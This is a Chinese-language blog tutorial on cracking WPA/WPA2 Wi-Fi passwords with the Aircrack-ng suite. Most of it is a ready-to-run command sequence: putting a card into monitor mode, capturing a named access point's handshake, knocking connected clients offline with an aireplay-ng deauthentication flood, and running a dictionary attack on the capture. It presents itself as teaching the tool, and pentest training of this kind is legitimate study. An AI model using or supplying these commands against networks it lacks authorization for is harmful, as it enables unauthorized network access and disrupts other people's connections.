• Wireless Attacks——Aircarck-ng


    利用Aircrack-ng工具破解WPA/WPA2加密模式的无线AP

    http://www.aircrack-ng.org/index.html

    1. 开启网卡的监听模式,命令:

    airmon-ng start wlan0

    验证是否开启Monitor模式,命令:

    iwconfig

    Mode:“Monitor”,表示网卡开启成功,可进行下一步操作。

    2. 利用网卡扫描附近WiFi,并记录下关键参数,命令:

    airodump-ng wlan0mon

    这时我们找到所需要的WiFi(Game2.4)按Ctrl+c并记录下关键参数,后续步骤会用到下列数据:

    1)BSSID: A0:63:91:CA:D2:9B (AP 的MAC地址)
    2)CH:11(信道)

    3. 开始监听、捕获握手包,命令:

    airodump-ng -w cao -c 11 --bssid A0:63:91:CA:D2:9B wlan0mon
    参数解释:   
    -w 文件位置,保存在/root/cao   -c 信道   --bssid BSSID 网卡名


    4. 再新建shell窗口 ,对目标WiFi进行攻击,命令:

    在上一步中我们是被动等待,何时能抓取到握手包依赖于何时有设备与该wifi完成成功的认证。

    我们可以用aireplay-ng进行deauth洪水攻击,使已连接它的客户端设备掉线,掉线设备一般会自动重连wifi,这样就能快速获取握手包。

    aireplay-ng -0 5 -a A0:63:91:CA:D2:9B -c E4:FD:A1:B7:18:A9 wlan0mon
    参数解释:   
    -0 是一种攻击模式,不间断攻击    5 发包次数为5次   -a BSSID   -c 为客户端MAC

     然后,返回看前面的窗口,检查是否抓到握手包,出现下图字样,则代表成功抓取握手包。

     

    5. 密码破解,命令:

    aircrack-ng -w /usr/share/wordlists/fasttrack.txt -b A0:63:91:CA:D2:9B cao-01.cap
    参数解释:
      -w 指定 密码字典(默认就有)
      
    -b 指定 路由器的MAC地址 截获的握手包

     

    6. 总结

      只适用于简单密码的破解,本文侧重点是讲解 Aircrack-ng 工具的使用。该工具使用命令行模式,使用时不是很方便,成功率依赖字典库。

    Life is not what you have gained but what you have done!
  • 相关阅读:
    Spring MVC(1)Spring MVC的初始化和流程以及SSM的实现
    Spring(四)Spring与数据库编程
    MyBatis(4)-- 动态SQL
    MyBatis(3)-- Mapper映射器
    MyBatis(2)-- MyBatis配置mybatis-config.xml
    MyBatis(1)-- MyBatis介绍
    计算机网络(2)-- URL、HTTP、HTTPS、HTML
    计算机网络(1)- TCP
    Shell脚本编程
    和为定值的多个数
  • 原文地址:https://www.cnblogs.com/cmt110/p/15124109.html
Copyright © 2020-2023  润新知